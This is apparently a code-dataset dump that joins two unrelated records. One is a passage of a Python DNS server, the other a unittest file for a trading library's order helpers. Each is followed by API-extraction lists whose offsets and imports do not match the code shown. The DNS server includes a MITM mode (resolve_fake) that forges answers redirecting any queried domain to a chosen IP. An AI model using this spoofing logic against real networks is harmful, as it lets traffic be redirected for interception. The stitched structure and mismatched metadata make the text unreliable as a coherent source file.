            # Bug fix: count_compression is never initialized at module
            # level in this file, so the first compressed name previously
            # raised NameError.  Lazily initialize it here.
            try:
                count_compression += 1
            except NameError:
                count_compression = 1
            c_offset, = struct.unpack('!H', pkt[offset:offset+2])
            c_offset = c_offset & 0x3fff  # pointer target is the last 14 bits
            offset += 2
            rightmostlabels, junk = get_domainname(pkt, c_offset)
            labellist += rightmostlabels
            Done = True
        else:
            offset += 1
            label = pkt[offset:offset+llen]
            offset += llen
            labellist.append(label)
            if llen == 0:  # zero-length label marks the root / end of name
                Done = True
    return (labellist, offset)
def ip2bytes(ip):
    """Pack a dotted-quad IPv4 address string into its 4 network-order bytes."""
    octets = [int(part) for part in ip.split('.')]
    return struct.pack('!BBBB', *octets)
# https://github.com/shuque/pydig GNUv2 (edited)
def pdomainname(labels):
    """Render a sequence of raw domainname labels as quoted printable text.

    Printable characters are emitted as-is; any other byte is escaped as a
    backslash followed by its 3-digit decimal value.  A lone empty label
    renders as the root name ".".
    """
    printables = b'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_-*+'
    rendered = []
    for label in labels:
        chunks = []
        for c in label:
            # iterating a bytes object yields ints; 1-byte values are
            # also tolerated for robustness
            if isinstance(c, int):
                c_int, c_chr = c, chr(c)
            else:
                c_int, c_chr = ord(c), c.decode()
            chunks.append(c_chr if c in printables else "\\%03d" % c_int)
        rendered.append(''.join(chunks))
    return "." if rendered == [''] else ".".join(rendered)
def resolve_remote(query):
    """Resolve *query* via Google's DNS-over-HTTPS JSON API.

    Returns (status, answers, authority) where each entry is a
    (name, type, class, TTL, data) tuple.  Only A (1), MX (15) and
    SOA (6) queries are forwarded; anything else yields status 3.
    """
    domainName, type, klass = query
    if type not in [1, 15, 6]:
        return (3, [], [])
    conn = http.client.HTTPSConnection('dns.google.com')
    conn.request('GET', '/resolve?name={}&type={}'.format(domainName, type))
    reply = json.loads(conn.getresponse().read().decode('utf-8'))

    def section_tuples(section):
        # flatten one JSON section into (name, type, class, TTL, data) tuples
        return [(rec['name'], rec['type'], klass, rec['TTL'], rec['data'])
                for rec in reply.get(section, [])]

    return (int(reply['Status']),
            section_tuples('Answer'),
            section_tuples('Authority'))
def resolve_fake(query, ip):
    """Fabricate a spoofed answer that points *query* at *ip* (MITM mode).

    A queries answer with *ip* directly; MX queries answer with the
    queried name itself at preference 10; SOA queries get an empty
    NOERROR answer.  Unsupported types return status 3 with no data.
    """
    domainName, type, klass = query
    if type not in [1, 15, 6]:
        return (3, [], [])
    answers = []
    if type == 1:
        # the queried host "resolves" straight to the supplied address
        answers.append((domainName, type, klass, 1, str(ip)))
    elif type == 15:
        # point the mail exchanger back at the queried domain itself
        answers.append((domainName, type, klass, 1, '10 ' + domainName))
    return (0, answers, [])
def build_answer_data(answer):
    """Serialize one (name, type, class, TTL, data) answer tuple into DNS
    wire format (name + fixed RR header + RDATA); see RFC 1035 sec 3.2.1.

    Supports A (1), MX (15) and SOA (6) records; raises for anything else.
    Logs each record to stdout as a side effect.
    """
    dn, type, cl, ttl, data = answer
    if type == 1:
        print('r: {}, type: {}, class {}, addr {}'.format(dn, dns.rdatatype.to_text(type), dns.rdataclass.to_text(cl), data))
        # RDLENGTH is a fixed 4 bytes for an IPv4 address
        return txt2domainname(dn) + struct.pack('!HHIH', type, cl, ttl, 4) + ip2bytes(data)
    if type == 15:
        # MX RDATA in text form is "<preference> <exchange>"
        priority, addr = data.split(' ', 2)
        if not addr.endswith('.'):
            addr += '.'  # ensure fully-qualified so the wire name is terminated
        print('r: {}, type: {}, class {}, preference {}, mx {}'.format(dn, dns.rdatatype.to_text(type), dns.rdataclass.to_text(cl), priority, addr))
        addr = txt2domainname(addr)
        # RDLENGTH = 2 bytes of preference + encoded exchange name
        return txt2domainname(dn) + struct.pack('!HHIHH', type, cl, ttl, 2 + len(addr), int(priority)) + addr
    if type == 6:
        # SOA RDATA text form: mname rname serial refresh retry expire minimum
        ns, hostmasta, serialNo, refresh, retry, expire, minTTL = data.split(' ')
        if not ns.endswith('.'):
            ns += '.'
        if not hostmasta.endswith('.'):
            hostmasta += '.'
        print('r: {}, type: {}, class {}, mname {}'.format(dn, dns.rdatatype.to_text(type), dns.rdataclass.to_text(cl), ns))
        soa = txt2domainname(ns) + txt2domainname(hostmasta) + struct.pack('!IIIII', *map(int, [serialNo, refresh, retry, expire, minTTL]))
        return txt2domainname(dn) + struct.pack('!HHIH', type, cl, ttl, len(soa)) + soa
    raise Exception('cant create response for that')
def resolve_zones(query, rr):
    """Build answer tuples for *query* from a locally hosted zone rdataset.

    SOA records (type 6) go to the authority section, everything else to
    the answer section.  Always returns status 0 (NOERROR).
    """
    dn, type, klass = query
    answers = []
    authority = []
    for record in rr:
        entry = (dn, record.rdtype, record.rdclass, rr.ttl,
                 str(record).replace('\\@', '.'))
        # route SOA records into the authority section
        target = authority if record.rdtype == 6 else answers
        target.append(entry)
    return (0, answers, authority)
def dns_response(request):
    """Build the full wire-format DNS response for a parsed *request*.

    For each query: try the locally configured zones first (authoritative
    answer); otherwise forward to the remote resolver, or fabricate a
    spoofed answer when args.mitm is set (SOA is always resolved remotely).
    Returns header + answer + authority sections as bytes.  The question
    section is omitted (QDCOUNT is emitted as 0).
    """
    answer = b''
    nswer = b''   # authority-section payload
    flags = 0
    ancount = 0
    nscount = 0
    status = 3 # default status not found
    for q in request.queries:
        (dn, type, cl) = q
        print('q: {}, type: {}, class {}'.format(dn, dns.rdatatype.to_text(type), dns.rdataclass.to_text(cl)))
        rr = None
        for zone in config.zones:
            try:
                rr = zone.find_rdataset(dn, type)
                break
            except: pass  # name/type not in this zone; try the next one
        if rr is not None and args.mitm is None:
            flags |= 1 << 10 # set authoritative
            status, normal, authoritative = resolve_zones(q, rr)
        else:
            # SOA always goes remote; other types are spoofed when MITM is on
            status, normal, authoritative = resolve_remote(q) if args.mitm is None or type in [6] else resolve_fake(q, str(args.mitm[0]))
        for r in normal:
            ancount += 1
            answer += build_answer_data(r)
        for r in authoritative:
            nscount += 1
            nswer += build_answer_data(r)
    flags |= 1 << 15 # set QR to (1) - Response
    flags |= 1 << 7 # RA - recursion available (RFC 1035 flag bit 7)
    flags |= 1 << 8 # RD - recursion desired (RFC 1035 flag bit 8)
    flags |= status  # RCODE occupies the low 4 bits
    id = struct.pack('!H', request.id)
    flags = struct.pack('!H', flags)
    qdcount = struct.pack('!H', 0)
    ancount = struct.pack('!H', ancount)
    nscount = struct.pack('!H', nscount)
    arcount = struct.pack('!H', 0)
    return id + flags + qdcount + ancount + nscount + arcount + \
        answer + nswer
def parse_dns_record(rawdata, offset):
    """Parse one DNS question/record at *offset* in *rawdata*.

    Returns (new_offset, (name, type, class)) with the name rendered as
    printable text.

    NOTE(review): only 4 bytes (type + class) are read after the name,
    but the offset advances by 10 as if a full RR header (type, class,
    TTL, RDLENGTH) followed — confirm against the caller whether this is
    meant to parse questions (should be +4) or resource records.
    """
    dn, offset = get_domainname(rawdata, offset)
    dn = pdomainname(dn)
    query_type, query_class = struct.unpack_from('!HH', rawdata, offset=offset)
    offset += 10
    query = dn, query_type, query_class
    return (offset, query)
| [
"struct.unpack",
"struct.unpack_from",
"struct.pack",
"uuid.uuid4"
] | [((263, 275), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (273, 275), False, 'import uuid\n'), ((6808, 6837), 'struct.pack', 'struct.pack', (['"""!H"""', 'request.id'], {}), "('!H', request.id)\n", (6819, 6837), False, 'import struct\n'), ((6850, 6874), 'struct.pack', 'struct.pack', (['"""!H"""', 'flags'], {}), "('!H', flags)\n", (6861, 6874), False, 'import struct\n'), ((6889, 6909), 'struct.pack', 'struct.pack', (['"""!H"""', '(0)'], {}), "('!H', 0)\n", (6900, 6909), False, 'import struct\n'), ((6924, 6950), 'struct.pack', 'struct.pack', (['"""!H"""', 'ancount'], {}), "('!H', ancount)\n", (6935, 6950), False, 'import struct\n'), ((6965, 6991), 'struct.pack', 'struct.pack', (['"""!H"""', 'nscount'], {}), "('!H', nscount)\n", (6976, 6991), False, 'import struct\n'), ((7006, 7026), 'struct.pack', 'struct.pack', (['"""!H"""', '(0)'], {}), "('!H', 0)\n", (7017, 7026), False, 'import struct\n'), ((7261, 7310), 'struct.unpack_from', 'struct.unpack_from', (['"""!HH"""', 'rawdata'], {'offset': 'offset'}), "('!HH', rawdata, offset=offset)\n", (7279, 7310), False, 'import struct\n'), ((1075, 1117), 'struct.unpack', 'struct.unpack', (['"""B"""', 'pkt[offset:offset + 1]'], {}), "('B', pkt[offset:offset + 1])\n", (1088, 1117), False, 'import struct\n'), ((1255, 1298), 'struct.unpack', 'struct.unpack', (['"""!H"""', 'pkt[offset:offset + 2]'], {}), "('!H', pkt[offset:offset + 2])\n", (1268, 1298), False, 'import struct\n'), ((721, 745), 'struct.pack', 'struct.pack', (['"""B"""', 'length'], {}), "('B', length)\n", (732, 745), False, 'import struct\n'), ((4112, 4150), 'struct.pack', 'struct.pack', (['"""!HHIH"""', 'type', 'cl', 'ttl', '(4)'], {}), "('!HHIH', type, cl, ttl, 4)\n", (4123, 4150), False, 'import struct\n')] |
from unittest.mock import MagicMock
import datetime
import json
import unittest
from tda.orders import EquityOrderBuilder
from tda.utils import Utils
from . import test_utils
class MockResponse:
    """Minimal stand-in for an HTTP response object used by the tests."""

    def __init__(self, json, ok, headers=None):
        self._json = json
        self.ok = ok
        # default to a fresh empty mapping instead of sharing a mutable default
        self.headers = {} if headers is None else headers

    def json(self):
        """Return the payload this response was constructed with."""
        return self._json
class UtilsTest(unittest.TestCase):
    """Unit tests for tda.utils.Utils: order-ID extraction from HTTP
    responses and most-recent-order search filtering."""
    def setUp(self):
        # fresh mocked client and Utils under test for every test case
        self.mock_client = MagicMock()
        self.account_id = 10000
        self.utils = Utils(self.mock_client, self.account_id)
        self.order_id = 1
        self.maxDiff = None
    ##########################################################################
    # extract_order_id tests
    def test_extract_order_id_order_not_ok(self):
        """A failed HTTP response must raise rather than return an ID."""
        response = MockResponse({}, False)
        with self.assertRaises(ValueError, msg='order not successful'):
            self.utils.extract_order_id(response)
    def test_extract_order_id_no_location(self):
        """Missing Location header -> no order ID can be extracted."""
        response = MockResponse({}, True, headers={})
        self.assertIsNone(self.utils.extract_order_id(response))
    def test_extract_order_id_no_pattern_match(self):
        """A Location header without an /orders/ path yields None."""
        response = MockResponse({}, True, headers={
            'Location': 'https://api.tdameritrade.com/v1/accounts/12345'})
        self.assertIsNone(self.utils.extract_order_id(response))
    def test_get_order_nonmatching_account_id(self):
        """A Location pointing at a different account ID must raise."""
        response = MockResponse({}, True, headers={
            'Location':
            'https://api.tdameritrade.com/v1/accounts/{}/orders/456'.format(
                self.account_id + 1)})
        with self.assertRaises(
                ValueError, msg='order request account ID != Utils.account_id'):
            self.utils.extract_order_id(response)
    def test_get_order_success(self):
        """Matching account ID -> the trailing order ID is returned."""
        order_id = self.account_id + 100
        response = MockResponse({}, True, headers={
            'Location':
            'https://api.tdameritrade.com/v1/accounts/{}/orders/{}'.format(
                self.account_id, order_id)})
        self.assertEqual(order_id, self.utils.extract_order_id(response))
    ##########################################################################
    # find_most_recent_order tests
    def order(self, time, symbol, quantity, instruction, order_type):
        """Build a realistic order dict with the given attributes.

        Each call hands out a new, monotonically increasing orderId so
        orders created later within a test remain distinguishable.
        """
        order = test_utils.real_order()
        order['orderId'] = self.order_id
        order['enteredTime'] = time
        order['closeTime'] = time
        order['accountId'] = self.account_id
        order['orderType'] = order_type
        order['orderLegCollection'][0]['quantity'] = quantity
        order['orderLegCollection'][0]['instruction'] = instruction
        order['orderLegCollection'][0]['instrument']['symbol'] = symbol
        order['orderActivityCollection'][0]['executionLegs'][0]['time'] = time
        order['orderActivityCollection'][0]['quantity'] = quantity
        order['orderActivityCollection'][0]['executionLegs'][0]['quantity'] \
            = quantity
        self.order_id += 1
        return order
    def test_most_recent_order(self):
        """With two candidate orders, the later enteredTime wins."""
        order1 = self.order(
            '2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
        order2 = self.order(
            '2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
        self.mock_client.get_orders_by_path = MagicMock(
            return_value=MockResponse([order1, order2], True))
        order = self.utils.find_most_recent_order()
        self.assertEqual(order2, order)
    def test_too_many_order_legs(self):
        """Orders with more than one leg are skipped by the search."""
        order1 = self.order(
            '2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
        order2 = self.order(
            '2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
        self.mock_client.get_orders_by_path = MagicMock(
            return_value=MockResponse([order1, order2], True))
        out_order = self.utils.find_most_recent_order()
        self.assertEqual(order2, out_order)
        # adding a second leg disqualifies order2, so order1 wins instead
        order2['orderLegCollection'].append(order2['orderLegCollection'][0])
        out_order = self.utils.find_most_recent_order()
        self.assertEqual(order1, out_order)
    def test_non_equity_asset_type(self):
        """Non-EQUITY asset types are excluded from the search."""
        order1 = self.order(
            '2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
        order2 = self.order(
            '2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
        self.mock_client.get_orders_by_path = MagicMock(
            return_value=MockResponse([order1, order2], True))
        out_order = self.utils.find_most_recent_order()
        self.assertEqual(order2, out_order)
        # switching order2 to OPTION disqualifies it, so order1 wins
        order2['orderLegCollection'][0]['instrument']['assetType'] = 'OPTION'
        out_order = self.utils.find_most_recent_order()
        self.assertEqual(order1, out_order)
    def test_different_symbol(self):
        """The symbol filter excludes orders for other symbols."""
        order1 = self.order(
            '2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
        order2 = self.order(
            '2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
        self.mock_client.get_orders_by_path = MagicMock(
            return_value=MockResponse([order1, order2], True))
        out_order = self.utils.find_most_recent_order(symbol='AAPL')
        self.assertEqual(order2, out_order)
        # retagging order2 as MSFT excludes it from the AAPL search
        order2['orderLegCollection'][0]['instrument']['symbol'] = 'MSFT'
        out_order = self.utils.find_most_recent_order(symbol='AAPL')
        self.assertEqual(order1, out_order)
    def test_quantity_and_symbol(self):
        """Passing quantity without symbol is rejected."""
        msg = 'when specifying quantity, must also specify symbol'
        with self.assertRaises(ValueError, msg=msg):
            out_order = self.utils.find_most_recent_order(quantity=1)
    def test_different_quantity(self):
        """The quantity filter excludes orders with other quantities."""
        order1 = self.order(
            '2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
        order2 = self.order(
            '2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
        self.mock_client.get_orders_by_path = MagicMock(
            return_value=MockResponse([order1, order2], True))
        out_order = self.utils.find_most_recent_order(
            symbol='AAPL', quantity=1)
        self.assertEqual(order2, out_order)
        # bumping order2's quantity excludes it from the quantity=1 search
        order2['orderLegCollection'][0]['quantity'] = 10
        out_order = self.utils.find_most_recent_order(
            symbol='AAPL', quantity=1)
        self.assertEqual(order1, out_order)
    def test_different_instruction(self):
        """The instruction filter excludes orders with other instructions."""
        order1 = self.order(
            '2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
        order2 = self.order(
            '2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
        self.mock_client.get_orders_by_path = MagicMock(
            return_value=MockResponse([order1, order2], True))
        out_order = self.utils.find_most_recent_order(
            instruction=EquityOrderBuilder.Instruction.BUY)
        self.assertEqual(order2, out_order)
        # flipping order2 to SELL excludes it from the BUY search
        order2['orderLegCollection'][0]['instruction'] = 'SELL'
        out_order = self.utils.find_most_recent_order(
            instruction=EquityOrderBuilder.Instruction.BUY)
        self.assertEqual(order1, out_order)
    def test_different_order_type(self):
        """The order-type filter excludes orders with other types."""
        order1 = self.order(
            '2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
        order2 = self.order(
            '2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
        self.mock_client.get_orders_by_path = MagicMock(
            return_value=MockResponse([order1, order2], True))
        out_order = self.utils.find_most_recent_order(
            order_type=EquityOrderBuilder.OrderType.MARKET)
        self.assertEqual(order2, out_order)
        # changing order2 to LIMIT excludes it from the MARKET search
        order2['orderType'] = 'LIMIT'
        out_order = self.utils.find_most_recent_order(
            order_type=EquityOrderBuilder.OrderType.MARKET)
        self.assertEqual(order1, out_order)
| [
"tda.utils.Utils",
"unittest.mock.MagicMock"
] | [((490, 501), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (499, 501), False, 'from unittest.mock import MagicMock\n'), ((555, 595), 'tda.utils.Utils', 'Utils', (['self.mock_client', 'self.account_id'], {}), '(self.mock_client, self.account_id)\n', (560, 595), False, 'from tda.utils import Utils\n')] |